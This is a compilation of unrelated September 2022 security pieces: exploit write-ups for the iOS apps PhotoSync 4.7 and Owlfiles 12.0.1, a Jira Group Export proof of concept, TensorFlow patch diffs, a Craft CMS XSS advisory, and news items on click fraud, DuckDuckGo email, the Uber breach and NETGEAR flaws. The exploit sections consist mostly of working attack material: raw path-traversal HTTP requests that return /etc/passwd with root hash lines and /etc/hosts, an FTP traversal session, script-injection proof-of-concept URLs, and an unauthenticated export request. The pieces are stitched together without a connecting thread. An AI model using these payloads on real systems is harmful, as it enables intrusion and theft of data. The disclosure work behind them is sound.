PhotoSync version 4.7 suffers from a local file inclusion vulnerability.

    # Exploit Title: PhotoSync 4.7 IOS APP Local file inclusion# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.photosync-app.com/home.html# Software Link:https://apps.apple.com/us/app/photosync-transfer-photos/id415850124# Version: 4.7# Tested on: iPhone IOS 16.0GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close-------HTTP/1.1 200 OKDate: Mon, 19 Sep 2022 06:35:11 GMTAccept-Ranges: bytesContent-Length: 2791### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false_avphidbridge:*:288:288:Apple Virtual Platform HIDBridge:/var/empty:/usr/bin/false_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false

PhotoSync 4.7 Local File Inclusion

Owlfiles File Manager version 12.0.1 suffers from local file inclusion and path traversal vulnerabilities.

    # Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/owlfiles-file-manager/id510282524# Version: 12.0.1# Tested on: Ios 16.0###########path traversal on HTTP built-in server###########GET /../../../../../../../../../../../../../../../System/ HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9If-None-Match: 42638202/1663558201/177889085If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMTConnection: closeContent-Length: 0-------HTTP/1.1 200 OKCache-Control: max-age=3600, publicContent-Length: 317Content-Type: text/html; charset=utf-8Connection: CloseServer: GCDWebUploaderDate: Mon, 19 Sep 2022 05:01:11 GMT<!DOCTYPE html><html><head><meta charset="utf-8"></head><body><ul><li><a href="Cryptexes/">Cryptexes/</a></li><li><a href="DriverKit/">DriverKit/</a></li><li><a href="Library/">Library/</a></li><li><a href="Applications/">Applications/</a></li><li><a href="Developer/">Developer/</a></li></ul></body></html>#############LFI on HTTP built-in server#############GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.8.101:8080Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25X-Requested-With: XMLHttpRequestReferer: http://192.168.8.101:8080/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close----HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Sat, 03 Sep 2022 01:37:01 GMTDate: Mon, 19 Sep 2022 03:28:14 GMTContent-Length: 213Cache-Control: max-age=3600, publicEtag: 1152921500312187994/1662169021/0### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost###############path traversal on FTP built-in server###############ftp> cd ../../../../../../../../../250 OK. Current directory is /../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        608 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        224 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        640 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1131 Jan 01 1970 devdrwxr-xr-x     0 root admin       4512 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp>#############XSS on HTTP built-in server#############poc 1:http://192.168.8.101:8080/download?path=<script>alert(rose)</script>poc 2:http://192.168.8.101:8080/list?path=<script>alert(rose)</script>

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion

Microsoft said it's tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.
"[The] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices," Microsoft Security Intelligence said in a sequence of tweets over the weekend.
The tech giant's

Microsoft said it's tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.

"\[The\] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices," Microsoft Security Intelligence said in a sequence of tweets over the weekend.

The tech giant's cybersecurity division is tracking the developing threat cluster under the name DEV-0796.

Attach chains mounted by the adversary commence with an ISO file that's downloaded onto a victim's machine upon clicking on a malicious ad or comments on YouTube. The ISO file, when opened, is designed to install a browser node-webkit (aka NW.js) or rogue browser extension.

It's worth noting that the ISO file masquerades as hacks and cheats for the Krunker first-person shooter game. Cheats are programs that help gamers gain an added advantage beyond the available capabilities during gameplay.

Also used in the attacks are DMG files, which are Apple Disk Image files primarily used to distribute software on macOS, indicating that the threat actors are targeting multiple operating systems.

The findings arrive as Kaspersky disclosed details of another campaign that lures gamers looking for cheats on YouTube into downloading self-propagating malware capable of installing crypto miners and other information stealers.

"Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security, especially for those who are keen on popular game series," the Russian cybersecurity firm said in a recent report.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of Large-Scale Click Fraud Campaign Targeting Gamers

Tired of advertisers spying on your private communications? This beta promises to kick tracking technology to the curb.

Having offered a privacy-focused search engine since 2008, DuckDuckGo is now turning its attention to email: Its new Email Protection service gives you an @duck.com email address, which you can use as a buffer between your actual email inbox and the outside world.

As well as forwarding your incoming messages to your main email address, DuckDuckGo Email Protection strips them of the tracking technologies so often embedded in the emails that inform the senders of when and where you're viewing your messages, and even which links you're clicking through.

You can also use the service to create email aliases, temporary addresses that you can use with sign-up forms on the web and then delete if you find they're attracting too much spam or too many marketing missives. (The Hide my Email service offered by Apple works in a similar way.)

All of this is being offered free of charge, although the service is still in beta—so you might notice the occasional bug or hiccup. Also, some features might change before the product gets a full launch.

Getting Started

The DuckDuckGo app automatically puts your new address into web forms.

DuckDuckGo via David Nield

To access DuckDuckGo Email Protection, you first need to download the DuckDuckGo Privacy Browser app for Android or iOS. With a browser tab open, tap the menu button (the three dots), then choose **Settings** and **Email Protection**. Tap **Get Started**, then follow the instructions to pick your @duck.com address and specify which address emails sent to it should be forwarded to.

Once you've chosen your address, it will start to appear automatically in forms in the DuckDuckGo Privacy Browser. If you need to get to your account settings from inside the app, tap the menu button (the three dots), then **Settings** and **Email Protection**—only this time you'll be taken to your email settings. Under **Account,** you can change your forwarding address.

Tap **Autofill**, and as well as seeing your main (public) DuckDuckGo email address, you'll see a private DuckDuckGo address has been generated for you: Tap **Copy** if you want to use it in a web form, or **Generate Private Duck Address** if you need to create another one. The same forwarding rules apply to your private email addresses as to your public one, but they're easier to dispose of.

You can use DuckDuckGo Email Protection in a desktop web browser as well, but you need the DuckDuckGo Privacy Essentials extension for Google Chrome, Mozilla Firefox or Microsoft Edge installed. As well as giving you access to your email addresses and settings, the add-on helps you search anonymously on the web, blocks hidden trackers on websites, and improves site connection security.

Using Email Protection

You can change your forwarding address whenever you need to.

DuckDuckGo via David Nield

You can start using your public and private DuckDuckGo email addresses straight away. Anything that comes through to your main inbox via the Email Protection service will be stripped of tracking technologies, and you'll see a message at the top of each email providing a summary of the work that DuckDuckGo has done.

Click **More** on this summary to get more detail, including the specific tracking tools that have been stripped out of the message. If the service has been able to upgrade any of the links to secure HTTPS—another perk of Email Protection—then again this will be outlined on the same page. At the bottom there's a feedback form you can use to report any problems with the service (remember, it's still in beta.)

To delete one of your private email addresses—perhaps if you're getting too much spam sent to it or you've stopped using the app that you used it to sign up for—you need to find an email sent to this address, then click **More** on the summary at the top of the message, then choose **Deactivate** next to the email address. It's not the most elegant way of managing your email addresses, but it does the job.

There aren't many settings for Email Protection, but you can get to them in the mobile DuckDuckGo app by tapping the menu button (the three dots) and then **Settings** and **Email Protection**. In your desktop web browser, click the DuckDuckGo extension icon, then the cog button, then **Settings** and **Email Protection**. There's also a quick link to **Create new Duck Address** when you open the extension.

How to Use DuckDuckGo’s Privacy-First Email Service

The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.

Unauthenticated Group Export for Jira < 1.0.3

Vulnerability Type: Unauthenticated Group Export

Vendor of Product: Atlassian Jira

Affected Product Code Base: Group Export for Jira

Product Version: < 1.0.3

Description: The Group Export for Jira < 1.0.3 versions allow unauthenticated user to export the groups from the Jira instance.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and get the list of Jira groups present.

Attack Type: Remote

Endpoint: /plugins/servlet/groupexportforjira/admin/json

Assigned CVE-ID: CVE-2022-39960

Steps To Reproduce

1\. Issue a HTTP POST request to the following endpoint: https://<jira.example.com>/plugins/servlet/groupexportforjira/admin/\[format\]

2\. For the HTTP POST Data send the following: "groupexport\_searchstring=&groupexport\_download=true"

#PoC

\[REQUEST\]

POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1

Host: jira.example.local

Content-Length: 51

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Connection: close

groupexport\_searchstring=&groupexport\_download=true

\[RESPONSE\]

HTTP/1.1 200

X-AREQUESTID: 996x459x1

Referrer-Policy: strict-origin-when-cross-origin

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Frame-Options: SAMEORIGIN

Content-Security-Policy: sandbox

Strict-Transport-Security: max-age=31536000

Set-Cookie: atlassian.xsrf.token=B2KZ-BVLZ-WLZO-E635\_0caad26e8df61a1995bb595e1e00d6f869571707\_lout; Path=/

X-AUSERNAME: anonymous

Content-Disposition: attachment; filename="jira-group-export-41178cce-e033-4f0a-bfad-c909e2435c5d.json"

Vary: User-Agent

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 815

{"jiraGroupObjects":\[{"groupName":"jira-administrators","jiraGroupApplicationRoleObjects":\[{"name":"Jira Software"}\],"users":1, \[REDACTED\]}\]}

CVE-2022-39960: Unauthenticated Group Export for Jira < 1.0.3

Plus: An AI artist exposes surveillance of Instagram users, the US charges Iranians over a ransomware campaign, and more.

Welp, Uber got hacked. The attacker, who claims to be 18 years old, appears to have gained full access to Uber’s systems. And while the company has confirmed the breach, it’s downplaying the incident by claiming it “has no evidence” that the attacker accessed users’ trip logs or other sensitive data. For a breach of this severity, relatively few details were available as of late Friday afternoon, so be ready for the other shoe to drop.

Earlier in the week, former Twitter security chief Peiter “Mudge” Zatko testified before the US Senate Judiciary Committee to further detail his claims against the company. Blowing the whistle carries serious security risks, but Zatko’s efforts appear to be having the intended effect. As WIRED contributor Matt Laslo reported, the hearing has reignited US lawmakers’ ambitions to better regulate Big Tech.

This week also saw the release of Apple’s iOS 16, which has two new security features that we hope you’ll never need to use. We spoke with Ukraine’s cyberwar chief, Yurii Shchyhol, who provided an optimistic update on the digital battlefront in the country’s war with Russia. And we dove into the contentious fight in the US Congress over the passage of a new federal privacy law that has some unexpected opposition.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

If you’ve crossed a US border in recent years, there’s a chance all your text messages, contacts, call records, and more are now stored in a database built by Customs and Border Protection—even if you’re a US citizen. Senator Ron Wyden, an Oregon Democrat, revealed this week that CBP copies data from as many as 10,000 devices per year. Agents search these phones, tablets, and computers without warrants. And the content taken off the devices is stored in a central database accessible to 2,700 Department of Homeland Security personnel, according to information CBP commissioner Chris Magnus provided to Wyden. CBP defended the practice as being “in accordance with statutory and regulatory authorities,” while Wyden condemned it as an “egregious violation” of citizens’ constitutional rights.

The fact that we are constantly being surveilled—and surveilling ourselves—shouldn’t be a shocker. But it’s one thing to know you’re being watched and quite another to see it in action. That eerie feeling is at the center of Belgian artist Dries Depoorter’s new project, _The Follower_. Using AI, geotagged Instagram photos, and publicly accessible surveillance cameras, Depoorter found CCTV video footage of the exact moments people snapped their Instagram pics. It’s a potent reminder that someone, somewhere could be spying on you anytime you’re out in public (and another reason to not add geotags to photos you share online).

The US Department of Justice this week indicted three Iranian nationals for allegedly carrying out a series of ransomware attacks that targeted a swath of entities in at least five countries, including the US, UK, Russia, Israel, and Iran. Victims in the US include utility companies in Mississippi and Indiana, according to the Justice Department, as well as a township and an accounting firm, both in New Jersey. Other targets include entities in the health care sector and a domestic violence center. The people accused of the ransomware attacks—Mansur Ahmadi, Ahmad Khatibi, and Amir Hossein Nickaein—are now on the FBI’s Most Wanted list, and the US State Department has issued a $10 million reward for information that helps lead to their “identification or location.”

Parents and teachers were aghast this week after a prankster hacked the popular school messaging app Seesaw and spammed users with the infamous image known as “goatse.” (Don’t Google it.) While the company didn’t say how many of its millions of users were affected, NBC News reports that school districts in Illinois, New York, Oklahoma, and Texas said they were exposed to the image. Seesaw spokesperson Sunniya Saleem confirmed that “specific user accounts were compromised by an outside actor” and that the company is taking the matter “extremely seriously” as it attempts to “prevent further spread of these images from being sent or seen by any Seesaw users.”

US Border Agents May Have a Copy of Your Text Messages

TensorFlow is an open source platform for machine learning. When `tf.random.gamma` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

@@ -16,7 +16,10 @@

  

import numpy as np

  

from tensorflow.python.eager import context

from tensorflow.python.framework import constant\_op

from tensorflow.python.framework import dtypes

from tensorflow.python.framework import errors

from tensorflow.python.framework import ops

from tensorflow.python.framework import random\_seed

from tensorflow.python.framework import test\_util

@@ -216,6 +219,16 @@ def testPositive(self):

self.assertEqual(0, math\_ops.reduce\_sum(math\_ops.cast(

math\_ops.less\_equal(x, 0.), dtype\=dtypes.int64)).eval())

  

def testSizeTooLarge(self):

\# Grappler asserts on size overflow, so this error is only caught when

\# running eagerly.

if context.executing\_eagerly():

with self.assertRaisesRegex((ValueError, errors.InvalidArgumentError),

"overflow"):

rate \= constant\_op.constant(1.0, shape\=(4, 4, 4, 4, 4))

self.evaluate(

random\_ops.random\_gamma(

shape\=\[46902, 51188, 34063, 59195\], alpha\=rate))

  

if \_\_name\_\_ \== "\_\_main\_\_":

test.main()

CVE-2022-36004: Fix size check for large input shape and rates. · tensorflow/tensorflow@552bfce

TensorFlow is an open source platform for machine learning. If `Conv2D` is given empty `input` and the `filter` and `padding` sizes are valid, the output is all-zeros. This causes division-by-zero floating point exceptions that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 611d80db29dd7b0cfb755772c69d60ae5bca05f9. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

@@ -759,6 +759,15 @@ def testConv2DExplicitPaddingWithDilations(self): padding\=\[\[2, 1\], \[1, 2\]\], dilations\=\[2, 3\])  
@test\_util.run\_in\_graph\_and\_eager\_modes() def testConv2dOnlyPaddingReturnsZeros(self): self.\_VerifyValues( tensor\_in\_sizes\=\[1, 0, 2, 1\], filter\_in\_sizes\=\[1, 1, 1, 1\], strides\=\[1, 1\], padding\=\[\[1, 1\], \[1, 1\]\], expected\=\[0, 0, 0, 0, 0, 0, 0, 0\])  
def testConv2DExplicitPaddingWithLayoutOptimizer(self): \# Test with Grappler's layout optimizer, to ensure the layout optimizer \# handles explicit padding correctly.

CVE-2022-35996: Fix conv2d crash when input size is empty. · tensorflow/tensorflow@611d80d

Craft CMS 4.2.0.1 is vulnerable to Cross Site Scripting (XSS) via Drafts.

September 07, 2022**1\. Vulnerability Properties**

**Title:** Stored XSS in Drafts in Craft CMS  
**CVE ID:** CVE-2022-37251  
**CVSSv3 Base Score:** 8.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N  
**Vendor:** Craft CMS  
**Products:** Craft CMS  
**Advisory Release Date:** 7 Sep 2022  
**Advisory URL:** https://labs.integrity.pt/advisories/cve-2022-37251  
**Credits:** Discovery by Gil Correia <gil.correia\[at\]devoteam.com>

**2\. Vulnerability Summary**

For this vulnerability the attacker needs to create a new Entry, and a Draft inside the freshly created Entry.  
After these steps, the XSS payload needs to be introduced in the “Draft name”. The reflection occurs in the “Apply draft” and in the “Save draft” functionality. Theres also a third reflection on the /admin/dashboard when the payload is already created and then added the “My Drafts” Widget to the dashboard.

**3\. Vulnerable Versions**

*   4.2.0.1

**4\. Solution**

*   Update to version 4.2.1 or higher

**5\. Vulnerability Timeline**

*   01/08/22 -Vulnerability reported to Craft CMS via their report page.
*   01/08/22 -Vulnerability verified by vendor.
*   01/08/22 -Vulnerability fixed by vendor
*   07/09/22 -Advisory released.

**6\. References**

*   https://github.com/craftcms/cms/commit/919c9074ff8596bf30a629b0888c529793e9a903

CVE-2022-37250 - Stored XSS in User Addresses Title in Craft CMS

CVE-2022-37720 (To Be Disclosed)

**Latest Advisories**

*   CVE-2022-37251 - Stored XSS in Drafts in Craft CMS
*   CVE-2022-37250 - Stored XSS in User Addresses Title in Craft CMS
*   CVE-2022-37248 - Stored XSS in Field Layout in Craft CMS
*   CVE-2022-37247 - Stored XSS in Fields in Craft CMS
*   CVE-2022-37246 - DOM Stored XSS in Craft CMS

**Latest Articles**

*   The Curious Case of Apple iOS IKEv2 VPN On Demand
*   Gmail Android app insecure Network Security Configuration.
*   Reviewing Android Webviews fileAccess attack vectors.
*   Droidstat-X, Android Applications Security Analyser Xmind Generator
*   Uber Hacking: How we found out who you are, where you are and where you went!

CVE-2022-37251: CVE-2022-37251 - Stored XSS in Drafts in Craft CMS

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Adam Bannister 16 September 2022 at 16:10 UTC  
Updated: 16 September 2022 at 16:11 UTC

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Vulnerabilities in a third-party module within the firmware of NETGEAR routers and Orbi WiFi Systems could lead to arbitrary code execution on affected devices.

The component in question is FunJSQ, “a third-party gaming speed-improvement service” developed by China-based Xiamen Xunwang Network Technology, included in NETGEAR firmware images, according to a security advisory published yesterday (September 15) by European IoT security firm ONEKEY.

Now patched, the high severity flaws included an unauthenticated command injection flaw (CVE-2022-40619), and an insecure auto-update mechanism (CVE-2022-40620) that enabled manipulator-in-the-middle (MitM) attacks, potentially leading to remote code execution (RCE).

Read more of the latest hardware security news

The issues, which were both given a CVSS score of 7.7, can only be exploited if an attacker has the victim’s WiFi password or access to an Ethernet connection to the router, according to a NETGEAR advisory.

Moreover, ONEKEY indicated that FunJSQ is seemingly only enabled when the Quality of Service (QoS) feature, which prioritizes internet traffic for applications like VoIP or online gaming, is also activated.

**Insecure auto-update**

The insecure auto-update mechanism led to arbitrary code execution from the WAN interface due to a trio of issues.

First, insecure communications arose from the “explicit disabling of certificate validation (-k), which allows us to tamper with data returned from the server”, according to ONEKEY researchers.

Second, the “update packages are simply validated via a hash checksum, packages are not signed in any way”.

And finally, “arbitrary extraction to the root path with elevated privilege \[allowed\] whoever controls the update package to overwrite anything anywhere on the device (which puts a lot of trust in a third party supplier)”.

**Command injection**

The command injection issue was discovered during an investigation of , which was exposed by HTTP server .

This endpoint accepted parameters that required an authentication token generated by a weak algorithm that used a hardcoded string and the device MAC address.

The resulting token was sent to a remote FunJSQ service for validation by curl.

“We found that the curl command line is built using the value, which is user controlled and unsanitized prior to creating the full command line,” revealed the researchers.

**Coordinated disclosure**

ONEKEY reported the bug to NETGEAR on May 19, and the Silicon Valley vendor disclosed details of the flaw alongside firmware updates on September 9.

Affected router models include R6230, R6260, R7000, R8900, R9000, and XR300, while the vulnerable Orbi WiFi Systems models are RBR20, RBS20, RBR50, and RBS50.

ONEKEY said the research highlighted the supply chain threat posed by “undocumented and vulnerable software components in widely deployed embedded devices”.

The researchers urged vendors to “assure that all included third-party vendors adhere to at least the same cybersecurity standards” as their own.

YOU MIGHT ALSO LIKE WAPPLES web application firewall faulted for multiple flaws

Tag

#apple